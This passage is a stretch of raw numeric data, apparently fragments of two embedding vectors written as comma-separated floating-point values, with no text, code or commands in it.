.008067053,-0.00092351134,-0.014756845,0.0011559249,-0.00040342205,-0.0038501646,0.0064499057,0.00010267391,0.011478229,0.00047682837,-0.008802089,0.01017572,0.0118180085,-0.006005604,-0.025466407,0.06443342,-0.008988265,0.020855002,-0.006188487,-0.009106674,0.015116785,-0.00010846283,-0.020208595,0.022935018,0.013073001,-0.0036845305,-0.01774887,0.023117995,-0.0021943722,-0.010989853,0.025355145,-0.0012611168,0.01730579,0.012036145,-0.02747986,-0.0029950142,-0.0014085729,0.0049187313,-0.007852144,-0.01854001,-0.004083154,0.029133037,-0.036979035,-0.019560661,-0.00431312,-0.009702991,-0.01915131,-0.0011504658,-0.0022434336,0.041760463,-0.031781707,0.006402176,0.021723028,-0.005364418,-0.024699321,0.029324777,0.0021367404,-0.013498723,-0.005566442,0.011485549,0.001890081,0.071325645,0.04200469,0.013185838,-0.005404536,-0.0084550725,0.023873013,-0.023147602,0.01377315,0.03853797,0.013200769,0.010208755,0.022521904,0.0019125657,0.010272755,0.0018114236,-0.009248983,-0.025618875,0.01108108,-0.005999847,-0.018682308,-0.017854149,-0.0012911587,-0.0050004893,-0.021216368,0.0076161614,0.0041057845,-0.015660346,0.01864954,0.0051691146,-0.017398937,-0.008832977,-0.0007851953,-0.010513581,0.054234378,-0.009899543,-0.06147668,0.015744552,0.17453854,0.000728714,0.007722839,0.02708526,0.007836805,-0.0015377263,-0.06843118,-0.022562644,-0.026079971,-0.007787998,-0.027073057,-0.018466407,-0.019538775,0.015589203,0.009005472,0.03856049,0.01781835,-0.041989375,0.015687162,-0.019218097,0.02112862,-0.0036136848,-0.00064594956,0.0289954,-0.024739092,0.012333953,0.027269842,-0.02946383,-0.019502655,0.0055600964,0.0053138,-0.00021605348,0.013174585,0.0101061845,-0.017020091,0.021249656,0.0030736052,-0.000681353,0.014563438,-0.02923409,0.005095768,-0.004460992,-0.016340924,-0.016364438,-0.13194053,-0.018343255,0.0051972643,-0.0013011972,0.028404428,0.0017933858,-0.000060424936,0.0077274125,0.004040155,-0.02578177,-0.01249383,0.0062396005,0.00848189,0.0054443204,0.004893994,-0.0047092964,-0.015806029,0.0009140188,0.001699023,0.0153274685,0.013590197,-0.012342224,-0.0116852885,0.0026392336,-0.0023566312,0.000791146,-0.0072542704,0.0066153877,0.013565496,0.030669926,-0.027422009,0.028487774,-0.004256716,-0.008779066,-0.019764246,-0.010593165,-0.015425229,0.007523802,0.003769562,-0.01810019,0.0031019147,-0.0064178305,-0.0018990593,0.010542354,-0.0011221977,0.007580183,0.018750101,-0.007888761,-0.0057128635,0.01133395,0.039727475,-0.0011090512,-0.03830982,-0.007075835,-0.0049996926,0.01690468,-0.0106222285,-0.003605476,0.007691898,0.013953988,-0.00065416,-0.019864928,-0.0076741455,-0.02256895,0.0386842,-0.015647667,0.0017847839,-0.022598067,0.005835405,-0.022690289,0.0027584583,-0.00025254258,0.027653534,-0.03718586,0.008102781,0.016830198,-0.007759989,-0.0037996634,-0.003787832,-0.015915943,-0.008479155,-0.015324283,0.013718561,-0.004192095,-0.0034046941,-0.005272568,-0.014500943,0.0018956659,0.0013005646,-0.0140798995,0.027846454,-0.0000045197244,0.02278092,0.008870841,0.0032773945,0.020178337,0.032133613,-0.0029769628,-0.01882065,0.029872695,0.0041232696,0.001670155,-0.0055555827,0.006788572,-0.02845763,0.0046705087,0.015586368,-0.024192976,-0.016913455,-0.0009148294,-0.006098253,0.017167754,0.012771987,-0.019604256,-0.03586585,-0.020592611,0.011293654,0.0008589545,-0.0041608945,-0.0126312915,-0.026287122,-0.026035024,-0.0017733802,0.012771123,0.03289814,0.0060301484,-0.032078613,-0.0005497887,-0.020266322,-0.018051114,0.007366518,0.00055829715,-0.014353751,0.018460106,-0.017631747,0.019920276,0.009091114,-0.017528871,-0.035837322,0.015482819,-0.003727199,-0.02954867,0.009221953,-0.0052710846,0.025760742,0.01746661,0.029442878,-0.022112936,0.018840687,0.005966889,-0.00045523565,0.044519834,-0.009437205,-0.017607685,-0.012322007,0.0775234,-0.0027452353,-0.013716887,-0.011351674,-0.02084129,0.011935539,0.024380678,-0.007632941,-0.027997926,0.002616423,-0.05175142,0.0013204316,-0.016093032,0.017309608,0.0032745139,0.034796983,0.008028871,0.02423963,0.005511384,0.0027049347,0.0028547265,-0.007915129,-0.008311178,0.03277101,0.029167641,-0.0217675,-0.0035716074,-0.01743161,-0.027044818,0.013621441,-0.009044223,0.0062733884,0.0016746355,-0.008192855,0.010628631,-0.04513756,-0.033991303,0.011635283,-0.0008113002,-0.0024951797,0.0134682115,-0.0066372473,0.02024001,-0.01662854,0.036133762,-0.0044173407,-0.006746771,0.026524937,-0.0060034175,0.025595352,-0.00020448247,0.025722254,0.006281434,-0.032521434,0.011086681,-0.034316853,0.014251504,-0.0075361473,0.004308978,0.011679885,0.017161004,-0.01982821,-0.0013960361,0.0025572472,-0.001185704,0.016481604,0.006981694,0.009257389,-0.0024254096,0.019717535,-0.009053728,-0.01935197,0.0067081563,0.015432886,0.0018674188,-0.006353111,-0.05000258,-0.0065464857,-0.023520457,0.00062572584,0.009297674,-0.010595023,0.02080276,0.012084774,-0.028782358,-0.053489767,-0.0064944765,-0.011629573,-0.028578473,0.018447414,0.017045708,0.020856522,0.015921269,0.0008268755,-0.0032270604,-0.011872312,-0.0075445287,0.01776668,0.0013601602,0.0022366494,-0.032902986,0.005317125,0.0053679314,-0.0071878633,-0.0043729325,-0.03861903,-0.004782068,-0.005078789,0.0022907301,-0.03713702,-0.010104964,0.011778073,0.006515365,-0.0072506433,-0.004347303,0.04332648,-0.024099505,-0.008492869,0.009029319,-0.029032312,-0.002646744,-0.017914,-0.006443494,0.02236749,0.06212431,0.011837309,0.016986905,0.015282446,-0.0019002368,0.009944378,-0.008672192,0.051806495,0.0030804942,0.039102517,-0.0060332553,-0.022874156,0.020792477,0.019160142,0.022130141,-0.011809408,-0.0036617022,0.01662717,-0.005518538,-0.00461646,-0.00041684217,0.020971278,0.008829757,-0.0048673796,-0.0147743225,0.003107764,-0.008844727,-0.0011067577,-0.0023508042,0.0034987999,-0.0011668467,0.01516872,0.002158691,-0.010694687,0.013646275,-0.0072071496,-0.0062863403,0.009577344,-0.006138998,-0.021683138,-0.02539901,0.024002938,0.026082981,-0.007888264,-0.00071048446,0.0008357391,-0.0114124855,-0.0069057974,-0.016360125,0.0010782395,-0.0013385587,0.0023194775,-0.0112788025,-0.013534413,-0.028222216,0.01878031,0.022574926,0.021966664,-0.026331892,-0.008158048,0.0056432914,0.0043290416,-0.02138621,0.028100733,-0.0016318924,0.0062426846,0.0100522395,0.001393422,-0.0028002602,-0.022366561,-0.013043905,0.0029696345,0.018505104,-0.028075023,-0.016231226,0.021639341,0.015682738,0.024403047,-0.015770433,-0.023379084,-0.005308297,0.027652053,-0.020678522,-0.00816233,-0.030433094,0.02479391,-0.018802725,-0.011399119,-0.009275134,-0.006359842,0.0078200055,0.019657886,0.016364919,0.011322313,-0.014660727,-0.018208906,0.0040522097,-0.010483376,0.022076208,0.015750501,-0.034612417,-0.022226853,-0.026710251,0.07169981,0.004155149,-0.019529853,-0.011159363,0.026643747,0.009585876,-0.012957649,0.019359568,-0.027926082,-0.001677664,-0.0158632,-0.02411928,0.005430537,0.013314753,-0.00434535,-0.030363249,0.013283926,-0.0038950571,-0.0017089191,-0.00014792486,-0.01289791,-0.0016099089,-0.004205294,0.004611653,-0.0222902,-0.05501306,-0.018019384,0.0121763535,-0.011403563,-0.0028065115,0.004320293,-0.009636998,-0.0098800305,-0.006694653,-0.0018246818,-0.0065848962,0.011813433,0.0011957823,0.0015265846,0.017232781,-0.0049695186,0.0050032637,-0.011584813,-0.032259945,-0.005022976,-0.0038127005,0.014948669,0.024037976,-0.008389225,0.013741323,-0.0055672782,0.013112422,-0.02727246,0.013291057,0.017305166,0.015444188,-0.0036780564,-0.019281471,-0.0031720751,0.0051290514,-0.015277726,0.008928435,-0.013480106,-0.011337202,-0.007595667,0.009833785,0.00012058828,-0.013639922,-0.019812066,0.005922364,-0.011777352,0.045729134,0.008920569,0.017070536,0.002683364,-0.004014084,-0.002434906,-0.0016629559,-0.018308554,0.00096822524,0.005847423,0.017898826,-0.015303543,-0.006544101,0.00986986,-0.0007470866,-0.039859068,0.0016483916,-0.005659346,-0.021357978,0.017019255,0.009455936,-0.008513627,-0.022623956,-0.019252785,0.022148615,0.0077244276,0.026368018,0.00860173,-0.024593519,0.0042595454,0.009765733,0.01639989,0.0018644314,0.001929709,-0.0060451506,-0.1269026,0.018419953,-0.0064215874,-0.028368779,-0.01081401,-0.009282273,0.028746894,0.043852787,0.018012518,-0.046369605,0.0067470404,0.020359715,-0.0031358395,0.013543385,-0.0033277764,0.016039737,-0.0074858344,-0.005425054,-0.012336415,0.01114253,-0.002971048,0.023951171,0.015737874,-0.016739683,-0.0017529333,0.018172858,-0.015676696,0.020046597,0.007916817,0.01351252,0.014550439,0.0033674769,0.006747973,0.0034007288,-0.0044835797,0.0028731632,-0.01273939,0.004744515,-0.017669223,0.011843761,0.005330104,-0.028075641,-0.006468635,0.0177824,-0.016139193,-0.0010835131,0.024351891,0.0033489603,0.013966852,-0.0148074515,-0.0070834523,-0.0019968715,0.02181234,0.006899587,0.0122396145,0.0114428615,-0.02986904,0.02369369,0.0040063746,-0.009989888,0.002118499,0.011983348,0.012636073,-0.016879397,-0.000060204307,0.0048200586,0.011612716,-0.005733313,-0.019198097,-0.008405066,0.0041236584,0.0020674781,-0.0075438768,-0.014855555,0.004566768,0.012527482,0.025759622,0.009509096,0.0022451847,0.03639476,-0.016925577,-0.016685495,0.0057594036,0.00017683946,0.021500494,0.004151169,-0.004047308,0.0035609326,0.0023441766,-0.018616555,0.020470941,-0.0069420147,-0.015866227,-0.028159648,0.003431257,0.011487536,-0.011629744,0.0237578,0.00864159,0.00997471,0.011679819,0.0026165468,0.0011004606,-0.0030405733,-0.09533192,0.0021579813,0.025764897,-0.0116537325,-0.0036060568,-0.0051191733,-0.005501588,0.012521688,0.022515574,-0.021114655,0.004601294,-0.0033474378,0.00941226,0.0006621516,-0.013819685,-0.012503683,-0.03517362,0.01022597,0.0005864731,-0.016991163,-0.008857938,0.004287058,-0.026731985,0.0009165687,-0.0065730345,-0.0011965549,-0.0020326574,0.0072681904,0.022304865,-0.029555282,-0.009111714,-0.009685717,-0.012106456,0.02483248,-0.013760608,-0.017663248,-0.004288336,-0.017703524,-0.014069533,0.009004065,-0.0009472573,-0.009724378,-0.0015724481,0.006119304,0.00050198584,0.023631623,-0.018801283,0.014599567,0.018765986,-0.019191986,-0.009144493,-0.009943214,0.012054086,0.013561191,-0.0065064146,-0.025126826,-0.025259241,-0.007821575,-0.014524975,-0.0131457215,-0.020733355,0.011283644,-0.011352167,-0.0016156391,-0.014839253,0.017576681,-0.006622098,-0.007478881,0.01710544,0.0073240567,-0.02623996,0.031540785,0.013844934,-0.0030834065,0.019037653,0.018739855,0.0025935024,0.0430456,0.036754902,-0.011429683,-0.008876381,0.0142518515,-0.027533581,-0.0050690304,-0.00036807146,-0.006638777,0.004402612,0.03208596,-0.016580533,0.008203293,-0.023683887,0.03441931,-0.008432015,-0.014373682,0.0141051775,0.021297708,0.008940244,0.0039646258,-0.025440767,0.008288321,-0.018877089,-0.0032305429,0.0039317766,0.0098964,-0.015086134,0.003669789,-0.0014284595,-0.0147561645,-0.014324044,0.00558157,0.021491582,-0.013854182,-0.0009706434,0.009870635,-0.02438085,0.0045032487,0.002419053,-0.013455852,-0.035353117,0.01908486,-0.032657,0.0066659567,-0.0052187764,0.0147505235,-0.051952958,0.0056569506,-0.006727902,0.017726205,0.005284073,0.0049299696,0.010933718,0.009931852,0.016243467,-0.031763412,-0.030667579,0.0037864395,0.02216652,-0.007181774,0.01932454,0.0070990548,0.013713248,-0.017643927,0.018950421,-0.015983632,-0.0026238882,-0.0080650505,-0.0033463938,0.016189212,-0.0041526826,0.004189248,-0.011288398,-0.0071065836,0.0091691045,-0.0020908208,-0.018439956,0.0053142356,-0.010616632,-0.0058755623,0.0113308225,-0.0013737191,-0.010965495,0.013774864,0.019483598,-0.01518581,0.005260997,-0.0071308454,0.020137398,-0.0075043538,0.0015665155,-0.010755865,0.012143069,-0.0072049717,-0.0031896962,-0.018069934,0.023324737,-0.00369471,0.034431215,0.023097629,0.007925941,0.021926038,-0.003009732,0.009052741,0.0032714861,0.0003100842,0.032359753,0.0025383504,-0.008615964,0.015682692,-0.0064242817,-0.023926927,0.025971266,-0.016090117,-0.0074775754,-0.00028582604,0.020199876,0.0073263785,-0.011115664,-0.0126710795,0.021016832,-0.018089242,0.009043558,0.014322771,0.03656,0.022651933,-0.013826574,0.018639151,0.003944925,0.042246275,0.03704828,-0.008080317,-0.0046923477,0.0005284203,-0.015137934,0.008627464,0.002270599,0.022122664,-0.010455303,-0.03269093,0.02087302,0.014025839,0.023568029,-0.007386311,0.016155392,-0.005830241,-0.012758099,0.015348317,0.025600798,0.007095011,-0.0027344057,-0.014625187,0.008739194,-0.0000015596236,-0.0023467548,0.029920626,-0.025469612,-0.003825294,0.0037395235,0.002486333,0.007777624,-0.010855572,0.0035056071,0.008314341,0.013103444,-0.009041041,0.024669964,-0.0033078531,-0.010838279,-0.007321699,0.014299055,0.003754561,0.0060931947,-0.0112435585,0.0033949632,-0.007921517,-0.013516347,-0.0057480535,0.019970253,0.005011764,-0.018469397,0.010803983,-0.009119824,0.0052835695,-0.019741995,0.019173335,0.0008826917,0.0019992355,0.010294236,-0.030696413,0.0028096405,0.02047385,-0.014322741,-0.009330064,-0.0068834843,0.03212456,0.03285545,-0.0141474,-0.03349227,-0.010830333,-0.0076625496,0.00868478,-0.008153261,-0.023253812,0.010823331,-0.0026306366,-0.007312863,0.0013925473,-0.008953907,0.0061453087,-0.017654177,-0.0065953718,0.02632537,0.0023024946,-0.016234897,-0.020832187,-0.014643243,0.010989432,0.024680056,-0.0024535512,0.00045416105,-0.0019348242,0.020165943,-0.012573442,-0.004385775,0.011200083,0.0073693176,-0.028172608,-0.01005605,0.009868981,0.0021620411,-0.0031638853,0.0152181415,0.0008390785,-0.008837688,0.034241255,0.022720408,0.0014157909,-0.008256995,0.02205,-0.0011599802,-0.011753379,0.012383158,-0.013193076,0.027450548,0.015269469,0.04069248,0.0076284027,0.019996576,-0.008525497,-0.010135386,0.004773544,0.023216894,0.040324178,-0.00834119,-0.010968759,0.014244904,0.00008181973,0.014581894,0.021002706,0.015088034,0.011327662,0.007366689,0.011914734,-0.00070274714,0.00008686267,-0.0039457516,0.003281014,0.031897224,-0.006880333,0.023287846,-0.007910879,-0.005982083,-0.0007457085,0.007550215,0.011778314,0.00034885638,-0.019906063,-0.0051739886,-0.0071290024,0.0039404263,0.008699996,-0.014160979,-0.0022811054,-0.016614819,0.00088238786,0.0044633723,-0.00077465153,0.02121169,-0.006041892,-0.0125874095,-0.012846724,0.0021246176,0.0038143466,-0.015698208,0.009227394,-0.0020298285,-0.057531174,-0.0035583798,0.0059358035,-0.014000513,0.015101171,0.004198733,-0.006102512,0.0023028015,-0.0074005923,0.0210466,-0.017898336,-0.015529364,0.0065907636,0.022536142,0.011913803,-0.01063555,-0.014452343,0.0146441115,-0.0026774055,0.008718684,-0.014367696,0.026440108,0.025718484,-0.0148048,0.009748797,-0.014011358,-0.0016405296,0.021427022,0.0045235762,0.013068013,-0.004463843,-0.0073054824,-0.021356907,-0.020571023,-0.017652754,0.013677923,-0.006418362,0.025281211,0.021999465,-0.028706167,0.0018808882,-0.009754889,0.012590939,-0.01519595,-0.0103838965,0.041783217,-0.024855549,-0.009828842,-0.017717853,-0.007741188,0.023065018,0.017152674,-0.0052029234,0.030910686,0.007997779,0.00048580236,0.004064045,-0.032698248,0.019277295,0.0036655813,0.0020499018,0.0072552315,0.019807627,-0.026372142,-0.012271376,0.025383571,-0.012953681,0.015381381,-0.025181029,-0.00065781415,0.015599829,-0.006487537,-0.0071276296,-0.0029413197,-0.006073394,0.01459547,-0.020507514,0.0035614558,-0.011739649,0.020837693,-0.0066484376,-0.0034599751,-0.0020072954,0.0013636512,0.00429729,-0.00016095895,0.0045752553,0.003469805,0.024988636,-0.00045204133,-0.0068827616,0.004786572,-0.0017096478,0.0016368728,-0.0040102694,0.0017824306,-0.0015678807,-0.0006631425,0.032597534,0.007756213,-0.023979208,-0.014406266,0.002476128,-0.0055801137,0.0015264071,-0.008579337,-0.00894545,0.008838689,0.015782546,-0.013634307,0.011186236,0.007608243,0.021992737,0.007664218,-0.0076736286,-0.007142958,0.0058648395,0.02142215,-0.00012877617,-0.003591025,-0.012630348,-0.0205138,-0.0099717425,-0.001171078,0.0069568777,0.00849865,0.0033002652,-0.0061648986,-0.0153966565,-0.007853263,-0.0062742126,0.02305816,0.020352082,0.015654305,-0.004411624,0.0075575835,0.02029941,-0.005428722,-0.006435235,0.0151941255,0.0023329835,-0.036509957,0.007922546,-0.0037085759,-0.0062917336,0.04737276,-0.0006481907,0.010506746,-0.018512258,-0.0063670464,-0.002518751,-0.019938195,0.002907685,-0.010272912,-0.011771335,0.012314635,0.030945404,-0.007426096,0.006464881,0.009796968,-0.008414874,0.023996647,0.017110948,0.020172557,-0.008778177,0.0033461025,0.012904624,0.014705875,-0.005917281,-0.040886056,-0.0123478435,-0.00078281417,-0.0033996855,-0.01557922,-0.005257495,0.042075466,0.010068432,0.022456802,0.013495624,0.0036806948,-0.010143721,-0.0003093707,-0.008509927,0.0058945604,-0.023428924,-0.0014643349,0.0018198265,-0.010539491,-0.0102786925,-0.013415652,0.0061641824,0.028051244,0.0023847877,0.0146501195,-0.0018922393,-0.011902452,0.0006837165,-0.0052537695,-0.004325533,0.023408089,0.0030545252,0.03078558,0.0035503078,0.014806953,0.032743353,0.009745095,0.020342031,-0.01583804,0.011688376,0.007604311,0.036353644,0.00015955152,0.001047907,0.0961977,0.014200349,-0.032664068,-0.010823287,0.0015051883,0.0022336727,0.03316076,-0.011615601,0.0067912526,-0.004554455,0.00044542024,-0.0072510447,0.00058919453,0.0010962907,-0.019483855,0.033272058,0.008650268,-0.003010504,-0.013198973,-0.029151307,-0.01096908,-0.04015877,-0.0043660756,-0.009755257,-0.0004917836,-0.054063715,-0.01238793,0.03785785,-0.0045046434,-0.007505037,0.019874265,0.019978879,0.0132183945,-0.011734953,-0.037088446,-0.0071654837,-0.007828292,0.00049767364,-0.01849055,-0.0013659743,-0.02145527,0.015880365,0.0006260279,-0.0004678245,-0.012003784,0.007343769,0.001687312,-0.006311496,0.022546543,0.0000014870701,-0.005145524,0.004285703,0.014973657,0.013217767,0.008351482,-0.0065477947,0.0022707067,-0.0022438432,0.0046453145,0.008772884,0.037487622,-0.017132256,-0.010804419,0.011107332,0.023412358,0.0050592097,-0.03269085,-0.0039994414,-0.031912755,-0.014366168,0.041040488,-0.010494036,0.0012705788,-0.00012546354,-0.01014569,0.009824781,-0.0028743017,-0.008113383,0.015462763,-0.024425419,0.008120043,0.0021318418,0.032363616,-0.011741954,0.01695885,0.0037494113,-0.0069442634,-0.034154497,-0.008917429,-0.002357177,0.0038886082,0.023015603,0.0039016618,0.02402426,-0.009731883,-0.023856038,0.027849607,-0.039834287,0.011357405,0.010440519,-0.008238575,0.009936246,-0.0014819406,-0.0040449924,-0.018449884,-0.013333836,0.01229201,0.013996894,-0.005168612,-0.006729826,-0.011624318,0.019997928,0.0038235807,0.010134022,-0.017120462,-0.0011148782,0.0038173595,-0.019544965,0.023010626,-0.012600109,-0.007906067,0.011275722,0.025056299,0.01926716,-0.008494454,0.009909768,-0.0029372107,-0.0020671666,0.0029729872,-0.023364829,0.000201169,-0.024129903,-0.0018600469,-0.006020437,-0.007466037,0.018932518,0.027016664,0.012641302,-0.010994603,0.00079567044,0.0078238435,-0.011608276,0.0007692216,-0.012086895,0.0059968685,-0.012668557,0.019569598,-0.014280052,0.041578397,0.001888089,0.00037406947,0.013104295,-0.009000181,-0.004570894,-0.010668601,-0.010791633,0.011642422,0.016695686,0.005114595,-0.024045564,-0.0018906494,-0.0057015186,0.007394576,-0.038220152,0.0028246283,0.0069369082,0.015074566,-0.015560107,-0.002350457,0.009467396,-0.0017531866,-0.01147112,-0.018003395,-0.0020660183,-0.014142615,-0.017419862,0.01843833,0.018981,-0.031659134,0.011083163,0.0237438,0.012499693,0.010422047,0.006516171,-0.017271651,-0.010354231,0.00047436543,0.008273489,0.013248824,0.02133719,-0.0054241642,0.03558151,0.005399447,0.013202402,0.02671695,0.0107334675,-0.03766956,0.04580414,0.001220116,-0.0345845,0.013727255,-0.0081257345,-0.0053071766,-0.009206585,0.041772712,-0.01762836,-0.010870978,-0.010508246,-0.009163465,-0.015480005,0.024760874,0.0353053,-0.008008318,-0.011042815,-0.029126598,0.008949766,0.0077982247,-0.015137646,-0.016161544,0.022019418,-0.010946469,-0.009751684,-0.014594214,0.01647379,-0.010959661,-0.029277548,-0.009656355,0.00926543,0.012529124,-0.004785714,-0.0024874443,-0.012752972,-0.018455913,0.0003400695,-0.0031378337,0.029509213,0.012562786,0.020680144,-0.0071158754,0.013351543,-0.00033619194,-0.0018199671,-0.014828966,-0.014098135,-0.021801537,-0.013674077,0.00006455078,-0.017772608,-0.035353974,-0.021018943,-0.015851986,0.0012494413,-0.009750682,-0.011375823,-0.016843105,-0.022993559,-0.010133705,0.011109361,-0.0060173674,-0.01756358,-0.008860134,0.0067666047,-0.0014541885,0.0054504103,0.017383132,-0.007418592,0.027093528,-0.017051447,-0.018305026,-0.005824741,-0.00510271,-0.024633344,-0.010726003,-0.009611567,-0.013142266,-0.02644077,-0.003983991,-0.009723154,-0.012359029,0.002732602,0.01856507,-0.014568827,0.009188925,-0.024802962,-0.0073178248,-0.010144603,0.018301632,0.0033558968,0.036781285,-0.054401062,-0.0015949663,0.048838973,-0.017520357,-0.021273898,0.0040969956,-0.006310803,-0.040695503,-0.023191726,0.015829723,-0.0013282475,-0.012102775,-0.01413544,0.025223292,-0.019743495,-0.00067138503,-0.012206121,-0.028632455,-0.009447516,-0.0156688,0.027236272,-0.027264623,-0.00019762,-0.0029153973,-0.029627625,-0.031244764,-0.018128991,0.0075271637,0.0042390777,-0.003881302,0.026157929,0.017794032,-0.027735375,-0.0061775497,0.008023891,0.009740085,0.01639025,0.030801874,-0.017512789,-0.0287576,-0.038292363,0.004935362,-0.031240022,0.0035140966,-0.009293189,-0.0010095064,0.0065780226,-0.012884622,0.1544118,0.012736925,-0.019657271,-0.0014230956,0.0043257014,-0.0064387284,-0.010992766,0.0058778906,-0.0019754993,0.010717005,-0.023453265,-0.008179922,-0.0032190783,0.02167733,0.022891842,-0.0043236506,0.007818517,0.17321925,0.0173446,0.013055913,0.011855649,0.005745271,0.01430273,0.014597861,0.01676269,-0.02922578,0.009753563,-0.023978962,0.0132371625,-0.016981957,0.0018552607,0.02348842,0.02484549,0.0035526254,0.014253888,0.012662412,0.0036864819,-0.008757003,-0.014471065,0.005635765,0.017675795,-0.0113182105,0.011023275,0.021560121,0.00513248,0.0013550917,-0.010606454,0.0056776563,0.020390172,0.039981663,-0.0016847537,-0.004182174,0.009250351,-0.007598287,0.0050332714,-0.013054312,-0.009289148,0.0019873625,-0.010699592,0.03358985,0.0070488523,0.019097827,-0.014639104,0.0126565,0.002572298,-0.009819503,-0.013494321,-0.005321968,0.010226006,-0.0011971089,-0.004080018,0.012535196,-0.014552063,0.0026066094,-0.00233385,-0.00030377795,-0.011034138,-0.00606568,0.018868087,-0.00917857,0.012500632,0.034194533,-0.008802404,0.009634095,0.005136545,0.013259854,0.02454418,0.0018577373,0.027105864,0.016974792,-0.023510043,-0.0024367154,-0.0059237527,0.014387102,-0.0032084142,0.017021956,-0.0068505756,0.0040212087,-0.0032169854,-0.025495084,-0.004397382,0.0042739217,0.00465689,0.039504185,-0.012633013,0.028915796,-0.012699597,0.0077970633,-0.014074429,-0.0036809053,0.027217155,-0.0139934,0.0020728346,0.013908065,-0.016856428,-0.007993058,0.00021976874,0.018494805,-0.021961415,-0.0028869065,-0.012605185,-0.009479623,0.014239954,-0.0004341689,-0.006426567,0.0068471367,0.0010871578,-0.010956792,-0.020012563,0.004917733,-0.005798757,0.0068142866,0.0053011156,0.015849562,-0.016574426,-0.007853291,0.007867822,-0.03231797,0.021616027,-0.011698102,0.032615513,0.0037554775,0.009774294,0.01120947,-0.02035687,-0.00025919758,-0.0039487313,0.016121486],[0.017224375,0.014675361,-0.0037600044,-0.005815454,-0.011345343,-0.024227643,-0.008027431,0.004456382,0.010897368,-0.0039577414,-0.0065530585,0.039926417,0.003629086,0.010443724,0.00069477473,0.02270898,0.011783393,0.004375829,0.007501723,-0.00425852,-0.00036559982,-0.021012036,-0.0034585746,-0.01210878,0.021046175,0.0033020668,0.00023371849,-0.017392693,-0.015154717,-0.009047016,0.0047248155,0.014803865,-0.001374062,-0.006197166,0.02385187,0.006304282,-0.011511448,-0.0037337532,0.009699789,-0.020765964,0.01506265,0.0033571161,0.013675667,0.018251926,0.011457829,-0.013490836,-0.009356678,-0.003237024,-0.034568496,-0.0037875997,-0.0026631064,0.018986374,-0.01667924,0.009154704,-0.0060593383,0.015005412,-0.011612001,-0.03565254,0.011964186,-0.0035142822,-0.0025256006,0.005415198,0.003646949,-0.011579576,0.020547185,0.012233972,-0.006128628,0.0035245519,-0.008875902,-0.01170016,0.009984692,-0.009237998,-0.010657717,0.004884969,0.010836339,-0.00093941356,0.001610937,-0.0033868114,-0.011758528,0.0020388998,-0.028465664,-0.014994521,-0.0018782172,-0.0035653112,0.00400047,-0.00507978,-0.027295435,-0.005983134,0.007865126,0.00047995563,-0.016148083,0.023271045,0.00037035573,0.009818899,-0.0015192284,0.01959014,0.01502926,0.001821703,0.0073080873,-0.008926895,-0.022936936,-0.013881424,-0.027633606,0.009910392,0.0017490824,-0.018298749,-0.01375124,-0.010637515,0.0041074594,0.014056326,-0.00013942964,-0.0010290097,0.0026029113,-0.007833162,-0.0010958344,0.0013440293,-0.0018019321,0.017072974,-0.019513084,0.005490622,-0.0018783285,0.009152556,0.010736377,0.004255511,0.00448784,-0.013688247,0.0006216353,0.0057644662,0.001277202,-0.0071032,-0.011141986,0.017624898,0.005300265,0.0067733275,-0.015403752,0.0032470513,-0.001181446,0.01040642,0.0005403415,-0.015093084,0.012875653,0.00930301,0.009125628,0.025249729,0.0041757207,0.007529104,0.015436552,0.017607704,0.022461561,0.012251055,0.0087846685,0.012300327,-0.0009821247,-0.00971235,-0.0014969722,0.0052727493,-0.0240434,-0.0006377315,-0.011351779,0.014607492,0.008052344,0.014452307,-0.0073311925,0.014342546,-0.005309869,-0.009895575,-0.0032535007,0.007833308,-0.015760506,-0.008585573,0.0050689243,0.009803688,0.015112944,0.013581547,-0.0057914048,0.0090274215,0.0057978304,0.0012612038,-0.0125700375,0.024944615,-0.019941702,0.024009336,0.003339516,-0.0016480443,0.029479492,0.015002074,0.02390948,0.0022302119,-0.0056625605,-0.015492274,0.010217519,-0.011634489,-0.002068555,-0.004202603,-0.019603593,-0.03026847,-0.013008159,0.11859505,-0.022454089,-0.0020985347,-0.019558063,-0.021969594,-0.00583205,0.0032436657,-0.01717046,-0.016424777,-0.008613004,-0.0023711452,0.009489116,-0.0022360568,0.0052875713,-0.026371675,0.022725886,0.015438403,0.010132298,-0.06923416,0.008675822,0.019570434,0.0076047587,0.020996341,0.0070326007,0.0017964109,0.008722075,0.00628688,-0.0207162,-0.0007492703,0.015946066,-0.00460386,0.009609559,-0.025461232,0.010249834,0.018648468,-0.019045219,0.0006355247,-0.022097783,-0.03493582,0.00017080945,0.013494883,0.008706592,-0.006632569,-0.010383014,0.0024668681,0.016343327,0.020594083,-0.00683417,0.00087979593,0.005855667,-0.008258561,-0.0028337252,0.0122517375,0.009702853,-0.015717192,-0.005675634,0.033431474,0.0070336093,-0.012135892,0.01568846,0.002628519,-0.0002447661,-0.0012144282,0.019117074,0.018234907,-0.020655293,0.016783617,0.021198183,0.01755788,-0.0044953115,-0.032753497,-0.013277121,0.0006050023,-0.028025925,0.00010415323,-0.0046037454,-0.016005397,0.016640322,0.0043731597,0.019560931,0.019826509,-0.009887065,-0.0116508445,0.00022718267,-0.0073085204,-0.019034594,-0.005875998,-0.030995205,-0.006333739,0.021979427,0.0033690277,0.0057746973,0.007268799,-0.0018288556,0.013985431,0.0077467994,-0.0014578847,-0.026318122,-0.018403739,-0.0096200425,0.02047316,0.014751933,-0.003309211,-0.00094150484,-0.022224428,0.029993748,-0.0058751493,-0.0147796385,0.012182228,-0.004841885,0.036487576,0.015380515,0.016170405,-0.00020127866,-0.0033533203,-0.010999731,-0.0011761653,-0.009892345,0.0060278713,0.006656711,-0.0106382165,-0.012176041,-0.011370547,0.021607058,0.004227399,-0.0034699866,-0.00980371,0.00976046,-0.017249806,0.026974723,-0.0001309851,0.013264367,0.013605864,-0.006419187,0.010349869,0.009007695,0.009721752,-0.017527753,0.0051569506,0.001698293,0.019538531,0.0023152155,0.03357197,-0.009231708,0.0031049785,-0.036355313,-0.0039400426,-0.010559397,-0.009363616,-0.011846486,0.001268372,0.0138421655,0.0052460767,-0.006272958,0.0071483697,-0.014727428,0.0024504613,-0.013600308,-0.013212386,-0.010350039,-0.0080070505,-0.020921802,-0.013977468,0.011160421,-0.0052866302,-0.0016137809,-0.007576225,0.07615576,-0.0005591263,0.0013118531,-0.00022106331,-0.0030482865,-0.015351843,0.04384159,0.018005691,0.0027303994,-0.021582546,-0.031452123,-0.0136315245,0.0034799117,0.024328288,-0.011962203,0.0041876365,-0.035570074,0.015272811,-0.021178097,-0.007834173,0.025297225,-0.023879413,-0.018174274,0.005071134,0.020592328,0.008598122,0.000354352,-0.014888245,0.009217899,-0.006662307,-0.014263545,-0.012357561,-0.0162425,0.00033221036,-0.03462918,0.0155267,0